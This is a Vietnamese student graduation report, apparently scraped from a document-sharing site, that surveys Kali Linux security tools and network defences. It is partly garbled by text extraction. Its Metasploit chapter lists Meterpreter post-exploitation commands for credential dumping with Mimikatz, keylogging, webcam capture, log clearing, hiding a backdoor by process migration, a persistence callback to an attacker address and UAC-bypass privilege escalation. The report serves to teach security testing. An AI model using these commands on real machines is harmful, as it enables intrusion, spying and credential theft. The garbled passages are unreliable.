BÁO CÁO TỐT NGHIỆP TÌM HIỂU CÁC CÔNG CỤ TRONG KALI LINUX

85 704 5
BÁO CÁO TỐT NGHIỆP TÌM HIỂU CÁC CÔNG CỤ TRONG KALI LINUX

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG KHOA CÔNG NGHỆ THƠNG TIN BÁO CÁO CHUN ĐỀ TỐT NGHIỆP TÌM HIỂU MỘT SỐ CÔNG CỤ TRONG KALI LINUX ỨNG DỤNG TRONG AN NINH MẠNG Giảng viên hướng dẫn : Sinh viên thực : Lớp : Mã số sinh viên : Khánh Hòa - 2019 TRƯỜNG ĐẠI HỌC KHOA CƠNG NGHỆ THÔNG TIN BỘ MÔN MẠNG VÀ TRUYỀN THÔNG BÁO CÁO CHUN ĐỀ TỐT NGHIỆP TÌM HIỂU MỘT SỐ CƠNG CỤ TRONG KALI LINUX ỨNG DỤNG TRONG AN NINH MẠNG GVHD: SVTH: Lớp: MSSV: Khánh Hòa, Tháng - 2019 MỤC LỤC MỤC LỤC DANH MỤC HÌNH VẼ THUẬT NGỮ VIẾT TẮT LỜI CẢM ƠN LỜI MỞ ĐẦU DANH MỤC HÌNH VẼ THUẬT NGỮ VIẾT TẮT Viết tắt VPN CSS Tiếng Anh Virtual Private Network Cross Site Scripting DoS Denial of server IP ISP VLAN LAN TCP Internet Protocol Internet Service Provider Virtual LAN Local area network Transmission Control Protocol UDP User Datagram Protocol SQL Structured Query Language SMTP POP3 Simple Message Transfer Protocol Post Office Protocol Version Malware Malicious Software JDB Java drive by IRC Internet Relay Chat HTTP Hyper Text Transfer Protocol FTP File Transfer Protocol DDoS Distributed Denial of Service Tiếng Việt Mạng riêng ảo Một kĩ thuật công thực thi mã độc tới website nạn nhân công block quyền truy cập website hay mạng người dùng thông qua lừa đảo với thông tin giả Giao thức internet Nhà cung cấp dịch vụ internet LAN ảo Mạng nội Tạo kết nối để trao đổi gói liệu Một kết nối thay cho TCP, thường sử dụng cho DNS, Voice over IP chia sẻ tập tin Ngơn ngữ truy vấn có cấu trúc, thường dùng để quản lý liệu hệ thống quản lý sở liệu quan hệ Một giao thức TCP/IP sử dụng để gửi nhận email Đây giao thức phổ biến để lấy email từ server Phần mềm độc hại, thiết kế để ăn cắp thơng tin, sai khiến máy tính nạn nhân cho phép kẻ cơng download thực thi mã độc máy chủ nạn nhân, nhiên có xuất thơng báo, lỗ hỏng Java Một hệ thống chat truyền tin nhắn người dùng thời gian thực Giao thức truyền tải siêu văn Sử dụng để upload download liệu từ máy tính server Tấn cơng từ chối dịch vụ Làm nạn nhân bị "ngập lụt" việc kết nối gói tin Nguồn Cracker Telnet Criminal Hacker TerminaL Network ICMP Internet Control Message Protocol DNS Domain Name System SYN The Synchronous Character Internet Information Server IIS TCP/IP OS MAC DHCP URL HTML SMB công DDoS gọi Booter hacker tội phạm giao thức mạng (network protocol) dùng kết nối với Internet kết nối mạng máy tính cục LAN dùng để thông báo lỗi xảy q trình truyền gói liệu mạng Máy chủ chạy DNS chuyển hostname chữ thành chữ số tương ứng ngược lại Idle Ký tự đồng hoá Đây chương trình WebServer tiếng Microsoft Transmission Control Protocol khối liệu and Internet Protocol nén, sau kèm thêm header gửi đến máy tính khác Phần header gói tin chứa địa IP người gửi gói tin Operation System Hệ điều hành Media Access Control điều khiển truy nhập môi trường, tầng giao thức truyền liệu - phần tầng liên kết liệu mơ hình OSI tầng Dynamic Host Configuration giao thức mà máy sử dụng Protocol để lấy dược tất thơng tin cấu hình cần thiết, bao gồm địa IP Uniform Resource Locator dùng để tài nguyên Internet Hyper Text Markup Language ngôn ngữ siêu văn Server Message Block protocols phổ biến cho PC, cho phép bạn dùng share files, disks, directory, printers LỜI CẢM ƠN Ngày thấy cơng nghệ thơng tin Internet thành phần thiếu đời sống ngày Điều có nghĩa thứ phụ thuộc vào máy tính mạng Chính nhiều ý đồ xấu nhắm vào hệ thống nhằm đánh cắp thông tin hay phá hoại hệ thống việc diễn thường xuyên thời đại Do đó, để đảm bảo máy tính hoạt động ổn định, liên tục, đòi hỏi hệ thống phải có cơng cụ bảo mật cao, hệ thống cảnh báo kịp thời, giải pháp dự phòng để khắc phục có cố Trong đề tài em xin giới thiệu số giải pháp giúp kiểm tra mức độ an toàn, lỗ hỏng tồn hệ thống mạng dựa kiến thức học kiến thức tìm hiểu nâng cao Em xin đưa công cụ đánh giá bảo mật chuyên dụng Kali Linux Để hoàn thành tốt đề tài em xin chân thành cảm ơn ban lãnh đạo Trường Đại học Nha Trang tất giảng viên tạo điều kiện thuận lợi nhiệt tình giảng dạy cho em suốt thời gian học vừa qua để em học tập tốt đạt kết ngày hôm Em xin chân thành gửi lời cảm ơn đến thầy ThS Mai Cường Thọ tận tình hướng dẫn cho em đề tài Do quy mơ đề tài, thời gian kiến thức hạn chế nên khơng tránh khỏi sai sót Em kính mong q thầy nhiệt tình đóng góp ý kiến để em cố, bổ sung hoàn thiện thêm kiến thức cho Em xin chân thành cảm ơn! LỜI NÓI ĐẦU Bảo mật lĩnh vực mà ngành công nghệ thông tin quan tâm Khi internet đời phát triển, nhu cầu trao đổi thông tin trở nên cần thiết Mục tiêu việc kết nối mạng giúp cho người sử dụng chung tài nguyên từ vị trí địa lý khác Cũng mà tài nguyên dễ dàng bị phân tán, dẫn đến việc chúng bị xâm phạm, gây mát liệu thơng tin có giá trị Bên cạnh việc sử dụng giải pháp cụ thể an ninh bảo mật cho hệ thống để đảm bảo cho liệu, thông tin hệ thống doanh nghiệp an toàn trước truy cập trái phép từ bên lẫn bên doanh nghiệp Việc kiểm tra hệ thống CNTT bị công hay không cần thiết Để kiểm tra an toàn hệ thống giả lập vụ cơng thử nghiệm Trong năm gần Kali Linux hệ điều hành sử dụng nhiều chuyên gia đánh giá bảo mật tích hợp nhiều cơng cụ chun dụng giúp đánh giá an toàn hệ thống Trước việc cần thiết phải có mơi trường để giả lập vụ cơng nhằm đánh giá an tồn hệ thống mạng nên em chọn đề tài – Tìm hiểu cơng cụ đánh giá bảo mật Kali Linux Kali phiên tiến hóa hệ điều hành BackTrack, xuất vào năm 2013 có cải tiến so với BackTrack để đạt vị trí định cộng đồng bảo mật toàn giới Để làm rõ hệ điều hành Kali linux công cụ bảo mật Kali Linux, báo cáo chia làm phần sau: Chương 1: Giới thiệu tổng quan Chương 2: Tìm hiểu hệ điều hành Kali Linux Chương 3: Tìm hiểu cơng cụ bảo mật Kali Linux Chương 4: Thử nghiệm Metasploit Nmap Kali Linux Chương 5: Một số giải pháp tăng cường tính bảo mật cho hệ thống CHƯƠNG I GIỚI THIỆU TỔNG QUAN Tổng quan bảo mật mạng I Bảo mật – xu hướng tất yếu Bảo mật lĩnh vực mà giới công nghệ thông tin quan tâm Một internet đời phát triển, nhu cầu trao đổi thông tin trở nên cần thiết Mục tiêu việc nối mạng làm cho người sử dụng chung tài nguyên từ vị trí địa lý khác Cũng mà tài ngun dễ dàng bị phân tán, dẫn điều hiển nhiên chúng bị xâm phạm, gây mát liệu thơng tin có giá trị Càng giao thiệp rộng dễ bị cơng, quy luật Từ đó, vấn đề bảo vệ thông tin đồng thời xuất Bảo mật đời Internet nơi hỗn loạn Mọi thơng tin mà bạn thực truyền dẫn bị xâm phạm Thậm chí cơng khai Bạn hình dung internet phòng họp, trao đổi phòng họp người khác nghe thấy Với internet người khơng thấy mặt nhau, việc nghe thấy thông tin hợp pháp khơng hợp pháp Vì vậy, phạm vi bảo mật lớn, khơng gói gọn máy tính, quan mà toàn cầu Chúng ta cần bảo vệ tài nguyên ? Tài nguyên mà nói đến liệu Đối với liệu, cần quan tâm yếu tố sau: • Tính bảo mật: Tính bảo mật cho phép nguời có quyền hạn truy cập đến • Tính tồn vẹn liệu: Dữ liệu khơng sửa đổi, bị xóa cách bất hợp pháp • Tính sẵn sàng: Bất lúc cần liệu ln sẵn sàng 10 • Chạy metasploit • • Sử dụng SMB PSEXEC Exploit 71 • • • Meterpreter Session mở ipconfig: xem địa private IP máy victim shell: chạy lệnh cmd máy victim • In ID tên user 72 • • • getuid: Cho biết username remote machine sysinfo: Cho biết thông tin tên máy tính, hệ điều hành Mimikatz: tool dùng để lấy password dạng cleartext Tool cài sẵn Kali • Hiện tất tài khoản có password máy nạn nhân 73 • ps: danh sách tiến trình chạy máy victim 74 • Thay đổi PID tiến trình malware Một số lệnh thông thường tác động vào máy victim meterpreter mở (thêm tuỳ chọn -h vào sau để biết chi tiết pháp): • • help: xem tất lệnh meterpreter kèm theo mô tả ngắn background: lệnh đưa session (phiên làm việc) chế độ nền, tức quay dấu nhắc “msf >” hóng kết nối từ victim (khác với lệnh exit hẳn) Quay trở lại phiên làm việc (dấu nhắc “meterpreter >”) cần nhập lệnh sessions -i [mã_phiên] • cd, pwd ls: lệnh trỏ thư mục, xem đường dẫn thư mục tại, liệt kê file thư mục y hệt thao tác linux, khác ta • • • • • • thao tác máy nạn nhân lcd lpwd: ngược lại, lệnh thao tác máy attacker show_mount: hiển thị thông tin ổ đĩa máy nạn nhân clearev: xoá log ghi lại lịch sử hoạt động máy nạn nhân download : tải file từ victim máy Lưu ý dạng đường dẫn win upload : tải file từ máy lên victim edit : xem chỉnh sửa file dòng lệnh 75 • excute -f [file] : thực thi file máy nạn nhân Có tuỳ chọn như: • • • • • • • • • • • • -H (ẩn tiến trình để victim ko nhìn thấy), -h (mở help xem hướng dẫn) ipconfig: xem địa private IP máy victim ps: danh sách tiến trình chạy máy victim search: tìm kiếm file folder thư mục định shell: chạy lệnh cmd máy victim keyscan_start: bắt đầu theo dõi nhập liệu từ bàn phím victim keyscan_dump: hiển thị chuỗi ký tự thu keyscan_stop: dừng theo dõi bàn phím screenshot: chụp hình máy nạn nhân webcam_list: xem danh sách webcam webcam_snap: chụp ảnh từ webcam webcam_stream: soi webcam migrate mã_pid: nạn nhân mở Task manager lên, hiển nhiên nhìn thấy file exe bạn chạy Để tránh bị lộ, bạn cần cấy file backdoor bạn vào tiến trình chạy khác Khi tiến trình gốc đi, kết nối tồn nhờ mã ký sinh vào tiến trình bị nhiễm (lưu ý migrate giấu tiến trình xâm nhập, tiến trình nhiễm bị tắt coi kết nối) Để thực migrate, đòi hỏi bạn phải leo thang đặc quyền • run vnc: xem trực tiếp diễn desktop máy nạn nhân Thiết lập persistence để cài vĩnh viễn tự động kích hoạt máy victim: Nếu để bình thường, bạn thâm nhập vào máy nạn nhân nạn nhân mở file trojan kết nối bạn khỏi phiên làm việc meterpreter nạn nhân tắt máy Vì để payload liên tục gửi tín hiệu attacker hứng kết nối lúc đc, bạn cần chạy persistance Sau thâm nhập thành công dấu nhắc “meterpreter >”, gõ lệnh sau: run persistence -S -i 60 -p [cổng] -r [ip] Leo thang đặc quyền (Privilege Escalation): bạn thâm nhập vào máy victim, hành động bạn dùng quyền tài khoản user đăng nhập, thực thi yêu cầu đòi hỏi phải có quyền administrator, bạn gặp thông báo “access is denied” ko thực Do cần leo thang đặc quyền để thực thi hành động với quyền quản trị cao • • • • Tại dấu nhắc “msf >”, gõ lệnh: use exploit/windows/local/bypassuac set session [mã_phiên]: nhập mã phiên làm việc set target [giá_trị]: mặc định giá trị tuơng ứng với kiến trúc 32bit run Để kiểm tra xem bạn thực leo thang đặc quyền thành công hay chưa, trở lại phiên session, dấu nhắc meterpreter, gõ lệnh getuid, Server username 76 Authority/System ok, chưa chạy lệnh getsystem , kiểm tra lại getuid Công cụ Nmap • Kiểm tra địa IP máy Kali Linux • Kết nối Windows Server 2012 với Kali Linux 77 • Sử dụng công cụ Nmap Kali Linux để quét password Server 78 79 C HƯƠNG V TRIỂN KHAI MỘT SỐ GIẢI PHÁP TĂNG CƯỜNG TÍNH BẢO MẬT CHO HỆ THỐNG I • Cơng nghệ tường lửa (FireWall) Firewall mềm: Là Firewall dạng phần mềm cài đặt Server, có tính linh hoạt cao Hình 5.24 Firewall mềm • Firewall cứng: Là firewall tích hợp vào thiết bị phần cứng Hình 5.25 : Firewall cứng 80 II - Công nghệ phát ngăn chặn xâm nhập mạng IDS/IPS Hệ thống phát xâm nhập (Intrusion Detect System - IDS): Hệ thống phát xâm nhập cung cấp thêm cho việc bảo vệ thông tin mạng mức độ cao IDS cung cấp thông tin công vào hệ thống mạng Tuy nhiên IDS không tự động cấm ngăn chặn cơng Hình 5.26 IDS - Hệ thống ngăn chặn xâm nhập (Intrusion Prevent System-IPS): Giải pháp ngăn ngừa xâm nhập nhằm mục đích bảo vệ tài nguyên, liệu mạng Chúng làm giảm bớt mối đe dọa công việc loại bỏ lưu lượng mạng bất hợp pháp, cho phép hoạt động hợp pháp tiếp tục Hình 5.27 IPS 81 - Những hạn chế IDS /IPS: Các sản phẩm IPS nhận biết trạng thái tầng ứng dụng (chỉ nhận biết dòng thơng tin tầng mạng) Do công tầng ứng dụng không bị phát ngăn chặn III Công nghệ mạng LAN ảo (VLAN) VLAN mạng LAN ảo Về mặt kỹ thuật, VLAN miền quảng bá tạo switch Bình thường router đóng vai tạo miền quảng bá VLAN kỹ thuật kết hợp chuyển mạch lớp định tuyến lớp để giới hạn miền đụng độ miền quảng bá VLAN sử dụng để bảo mật nhóm VLAN theo chức nhóm Hình 5.28 VLAN IV Mạng riêng ảo (VPN) Mạng VPN an toàn bảo vệ lưu thông mạng cung cấp riêng tư, chứng thực toàn vẹn liệu thơng qua giải thuật mã hố 82 Hình 5.29 VPN Đánh giá hướng phát triển V Đánh giá đề tài Các vấn đề đạt 1.1 - Khẳng định tầm quan trọng bảo mật - Tìm hiểu khái niệm bảo mật, hệ điều hành Kali Linux số công cụ bảo mật ứng dụng an ninh mạng - Thử nghiệm số công cụ bảo mật Kali Linux - Đề xuất số giải pháp tăng cường bảo mật cho hệ thống mạng Hạn chế 1.2 - Do trình độ có hạn thời gian đầu tư cho đề tài chưa nhiều nên đề tài có số hạn chế: báo cáo chưa tìm hiểu hết vấn đề cần nghiên cứu đề tài, lí thuyết thử nghiệm nhiều sai sót cần khắc phục Hướng phát triển 83 - Đây đề tài hay thực tế thời kì mà công nghệ thông tin phát triển vô mạnh mẽ Việc bảo mật thông tin tránh xâm nhập, đánh cắp trái phép quan trọng - Kali Linux công cụ tuyệt vời để chuyên gia bảo mật sử dụng chuyên nghiệp Để sử dụng Kali Linux cách hiệu quả, báo cáo cần phải tìm hiểu sâu cơng cụ bảo mật, cách sử dụng chúng ứng dụng hiệu thực tế 84 TÀI LIỆU THAM KHẢO - https://123doc.org//document/4003918-do-an-tot-nghiep-danh-gia-bao-mat-hethong-mang-cong-cu-kali-linux.htm - https://whitehat.vn/threads/kali-linux-toan-tap.1120/ - https://quantrimang.com/cach-cai-dat-va-su-dung-kali-linux-126114 85 ... hành Kali linux công cụ bảo mật Kali Linux, báo cáo chia làm phần sau: Chương 1: Giới thiệu tổng quan Chương 2: Tìm hiểu hệ điều hành Kali Linux Chương 3: Tìm hiểu cơng cụ bảo mật Kali Linux. ..BÁO CÁO CHUYÊN ĐỀ TỐT NGHIỆP TÌM HIỂU MỘT SỐ CÔNG CỤ TRONG KALI LINUX ỨNG DỤNG TRONG AN NINH MẠNG GVHD: SVTH: Lớp: MSSV: Khánh Hòa, Tháng... người sử dụng hiểu rõ Kali, biết cách sử dụng công cụ chuyên dụng thực công việc tùy theo nhu cầu Tóm lại, với Kali Linux không phiên BackTrack, mà tiến hóa Mục đích nhà phát triển Kali trì cung

Ngày đăng: 25/05/2019, 08:40

Từ khóa liên quan

Mục lục

  • LỜI CẢM ƠN

  • LỜI NÓI ĐẦU

  • CHƯƠNG I GIỚI THIỆU TỔNG QUAN

    • I. Tổng quan về bảo mật mạng

      • 1. Bảo mật – một xu hướng tất yếu

      • 2. Chúng ta cần bảo vệ những tài nguyên nào ?

      • 3. Kẻ tấn công là ai ?

      • 4. Những lỗ hổng bảo mật

      • 5. Các quy tắc bảo mật

      • II. Các kiểu tấn công của Hacker

        • 1. Tấn công trực tiếp

        • 2. Kỹ thuật đánh lừa : Social Engineering

        • 3. Kỹ thuật tấn công vào vùng ẩn

        • 4. Tấn công vào các lỗ hổng bảo mật

        • 5. Khai thác tình trạng tràn bộ đệm

        • 6. Nghe trộm

        • 7. Kỹ thuật giả mạo địa chỉ

        • 8. Kỹ thuật chèn mã lệnh

        • 9. Tấn công vào hệ thống có cấu hình không an toàn

        • 10. Tấn công dùng Cookies

        • 11. Can thiệp vào tham số trên URL

        • 12. Vô hiệu hóa dịch vụ

        • 13. Một số kiểu tấn công khác

Tài liệu cùng người dùng

Tài liệu liên quan